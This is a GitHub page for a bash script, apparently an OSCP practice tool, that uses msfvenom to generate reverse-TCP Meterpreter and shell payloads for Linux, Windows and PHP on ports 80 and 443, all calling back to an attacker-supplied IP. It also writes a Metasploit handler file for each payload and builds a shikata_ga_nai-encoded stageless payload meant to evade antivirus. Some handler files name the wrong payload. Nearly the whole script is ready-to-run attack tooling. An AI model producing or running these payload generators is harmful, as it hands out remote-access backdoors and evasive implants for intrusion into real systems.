forked from ucki/multipass
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmultipass.sh
196 lines (171 loc) · 11.2 KB
/
multipass.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
#!/bin/bash
echo " __ __ _ _ _ _____ ___ ____ _ ____ ____"
echo "| \/ | | | | | |_ _|_ _| _ \ / \ / ___/ ___|"
echo "| |\/| | | | | | | | | || |_) / _ \ \___ \___ \ "
echo "| | | | |_| | |___| | | || __/ ___ \ ___) |__) |"
echo "|_| |_|\___/|_____|_| |___|_| /_/ \_\____/____/"
echo ""
echo "Usage: Multipass KaliboxIP"
echo "Alternative use Multipass eth0 or tap0"
echo "Use msfconsole -r NAMEOFTHEPAYLOAD.rc to set up the handler for the payload"
echo "---------------------------------------------------------------------------------"
echo "Thx Unfo for the original Idea"
echo "Thx for the discord crowd for the kick to do it in a propper way"
echo "---------------------------------------------------------------------------------"
echo " Version 3.0 Date: 19.06.2018"
echo "Changes: basic AV evasion, and handler setup scripts"
echo "---------------------------------------------------------------------------------"
echo "mp payloads = METERPRETER = UNSAFE for the OSCP Exam .. just saying"
echo "ave payloads = tend to work against basic AV and Firewalls. For better payloads we need veil evasion framework. For that there will be a extra version of multipass soon (TM) "
mkdir ./$@
mkdir ./$@/linux
mkdir ./$@/windows
mkdir ./$@/php
echo "###################### Reverse TCP MP Linux Port 80 and 443 #################"
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=$@ LPORT=443 -f elf -o ./$@/linux/linux_x86_mp_rev_tcp_p443.elf
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=$@ LPORT=443 -f c -o ./$@/linux/linux_x86_mp_rev_tcp_p443.c
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=$@ LPORT=80 -f elf -o ./$@/linux/linux_x86_mp_rev_tcp_p80.elf
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=$@ LPORT=80 -f c -o ./$@/linux/linux_x86_mp_rev_tcp_p80.c
#RC File for MP 443 and Port 80
#Port 443
touch ./$@/linux/linux_x86_mp_rev_tcp_p443.rc
echo use exploit/multi/handler >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc
echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc
echo set LHOST $@ >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc
echo set LPORT 443 >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc
echo set ExitOnSession false >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc
echo exploit -j -z >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc
#Port 80
touch ./$@/linux/linux_x86_mp_rev_tcp_p80.rc
echo use exploit/multi/handler >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc
echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc
echo set LHOST $@ >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc
echo set LPORT 80 >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc
echo set ExitOnSession false >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc
echo exploit -j -z >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc
echo "###################### Reverse Shell Linux X86 Port 80 and 443 #################"
msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=$@ LPORT=443 -f elf -o ./$@/linux/linux_X86_shell_rev_tcp_p443.elf
msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=$@ LPORT=443 -f c -o ./$@/linux/linux_X86_shell_rev_tcp_p443.c
msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=$@ LPORT=80 -f elf -o ./$@/linux/linux_X86_shell_rev_tcp_p80.elf
msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=$@ LPORT=80 -f c -o ./$@/linux/linux_X86_shell_rev_tcp_p80.c
#RC File for Shell 443 and Port 80
#Port 80
touch ./$@/linux/linux_X86_shell_rev_tcp_p80.rc
echo use exploit/multi/handler >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc
echo set PAYLOAD linux/x86/shell_reverse_tcp >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc
echo set LHOST $@ >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc
echo set LPORT 80 >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc
echo set ExitOnSession false >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc
echo exploit -j -z >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc
#Port 443
touch ./$@/linux/linux_X86_shell_rev_tcp_p443.rc
echo use exploit/multi/handler >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc
echo set PAYLOAD linux/x86/shell_reverse_tcp >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc
echo set LHOST $@ >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc
echo set LPORT 443 >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc
echo set ExitOnSession false >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc
echo exploit -j -z >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc
echo "###################### Reverse MP Windows x86 Port 80 and 443 #################"
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$@ LPORT=443 -f exe -o ./$@/windows/win_X86_mp_rev_tcp_p443.exe
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$@ LPORT=443 -f c -o ./$@/windows/win_X86_mp_rev_tcp_p443.c
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$@ LPORT=80 -f exe -o ./$@/windows/win_X86_mp_rev_tcp_p80.exe
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$@ LPORT=80 -f c -o ./$@/windows/win_X86_mp_rev_tcp_p80.c
#RC File for Shell 443 and Port 80
#Port 443
touch ./$@/windows/win_X86_mp_rev_tcp_p443.rc
echo use exploit/multi/handler >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc
echo set LHOST $@ >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc
echo set LPORT 443 >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc
echo set ExitOnSession false >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc
echo exploit -j -z >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc
#Port 80
touch ./$@/windows/win_X86_mp_rev_tcp_p80.rc
echo use exploit/multi/handler >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc
echo set LHOST $@ >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc
echo set LPORT 80 >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc
echo set ExitOnSession false >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc
echo exploit -j -z >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc
echo "###################### Reverse x86 Shell Windows Port 80 and 443 #################"
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=$@ LPORT=443 -f exe -o ./$@/windows/win_X86_shell_rev_tcp_p443.exe
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=$@ LPORT=443 -f c -o ./$@/windows/win_X86_shell_rev_tcp_p443.c
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=$@ LPORT=80 -f exe -o ./$@/windows/win_X86_shell_rev_tcp_p80.exe
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=$@ LPORT=80 -f c -o ./$@/windows/win_X86_shell_rev_tcp_p80.c
#RC File for Shell 443 and Port 80
#Port 443
touch ./$@/windows/win_X86_shell_rev_tcp_p443.rc
echo use exploit/multi/handler >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc
echo set LHOST $@ >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc
echo set LPORT 443 >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc
echo set ExitOnSession false >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc
echo exploit -j -z >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc
#Port 80
touch ./$@/windows/win_X86_shell_rev_tcp_p80.rc
echo use exploit/multi/handler >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc
echo set LHOST $@ >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc
echo set LPORT 80 >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc
echo set ExitOnSession false >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc
echo exploit -j -z >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc
echo "###################### Reverse PHP MP Port 80 and 443 #################"
echo "<?php" > ./$@/php/php_mp_rev_tcp_p80.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=$@ LPORT=80 -f raw >> ./$@/php/php_mp_rev_tcp_p80.php
echo "?>" >> ./$@/php/php_mp_rev_tcp_p80.php
echo "<?php" > ./$@/php/php_mp_rev_tcp_p443.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=$@ LPORT=443 -f raw >> ./$@/php/php_mp_rev_tcp_p443.php
echo "?>" >> ./$@/php/php_mp_rev_tcp_p443.php
#RC File for Shell 443 and Port 80
#Port 443
touch ./$@/php/php_mp_rev_tcp_p443.rc
echo use exploit/multi/handler >> ./$@/php/php_mp_rev_tcp_p443.rc
echo set PAYLOAD php/meterpreter_reverse_tcp >> ./$@/php/php_mp_rev_tcp_p443.rc
echo set LHOST $@ >> ./$@/php/php_mp_rev_tcp_p443.rc
echo set LPORT 443 >> ./$@/php/php_mp_rev_tcp_p443.rc
echo set ExitOnSession false >> ./$@/php/php_mp_rev_tcp_p443.rc
echo exploit -j -z >> ./$@/php/php_mp_rev_tcp_p443.rc
#Port 80
touch ./$@/php/php_mp_rev_tcp_p80.rc
echo use exploit/multi/handler >> ./$@/php/php_mp_rev_tcp_p80.rc
echo set PAYLOAD php/meterpreter_reverse_tcp >> ./$@/php/php_mp_rev_tcp_p80.rc
echo set LHOST $@ >> ./$@/php/php_mp_rev_tcp_p80.rc
echo set LPORT 80 >> ./$@/php/php_mp_rev_tcp_p80.rc
echo set ExitOnSession false >> ./$@/php/php_mp_rev_tcp_p80.rc
echo exploit -j -z >> ./$@/php/php_mp_rev_tcp_p80.rc
echo "###################### Reverse PHP Shell Port 80 and 443 #################"
echo "<?php" > ./$@/php/php_rev_tcp_p80.php
msfvenom -p php/reverse_php LHOST=$@ LPORT=80 -f raw >> ./$@/php/php_rev_tcp_p80.php
echo "?>" >> ./$@/php/php_rev_tcp_p80.php
echo "<?php" > ./$@/php/php_rev_tcp_p443.php
msfvenom -p php/reverse_php LHOST=$@ LPORT=443 -f raw >> ./$@/php/php_rev_tcp_p443.php
echo "?>" >> ./$@/php/php_rev_tcp_p443.php
#RC File for Shell 443 and Port 80
#Port 443
touch ./$@/php/php_rev_tcp_p443.rc
echo use exploit/multi/handler >> ./$@/php/php_rev_tcp_p443.rc
echo set PAYLOAD php/reverse_php >> ./$@/php/php_rev_tcp_p443.rc
echo set LHOST $@ >> ./$@/php/php_rev_tcp_p443.rc
echo set LPORT 443 >> ./$@/php/php_rev_tcp_p443.rc
echo set ExitOnSession false >> ./$@/php/php_rev_tcp_p443.rc
echo exploit -j -z >> ./$@/php/php_rev_tcp_p443.rc
#Port 80
touch ./$@/php/php_rev_tcp_p80.rc
echo use exploit/multi/handler >> ./$@/php/php_rev_tcp_p80.rc
echo set PAYLOAD php/reverse_php >> ./$@/php/php_rev_tcp_p80.rc
echo set LHOST $@ >> ./$@/php/php_rev_tcp_p80.rc
echo set LPORT 80 >> ./$@/php/php_rev_tcp_p80.rc
echo set ExitOnSession false >> ./$@/php/php_rev_tcp_p80.rc
echo exploit -j -z >> ./$@/php/php_rev_tcp_p80.rc
echo "//////////////////////////AV EVASION PAYLOADS ETC \\\\\\\\\\\\\\\\\\\\\\\\"
msfvenom -a x86 --platform windows -a x64 -p windows/x64/meterpreter_reverse_https --encoder x86/shikata_ga_nai LHOST=$@ LPORT=443 -f exe -o ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.exe
msfvenom -a x86 --platform windows -a x64 -p windows/x64/meterpreter_reverse_https --encoder x86/shikata_ga_nai LHOST=$@ LPORT=443 -f c -o ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.c
#RC File for Shell 443
#Port 443
touch ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc
echo use exploit/multi/handler >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc
echo set PAYLOAD windows/x64/meterpreter_reverse_https >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc
echo set LHOST $@ >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc
echo set LPORT 443 >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc
echo set ExitOnSession false >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc
echo exploit -j -z >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc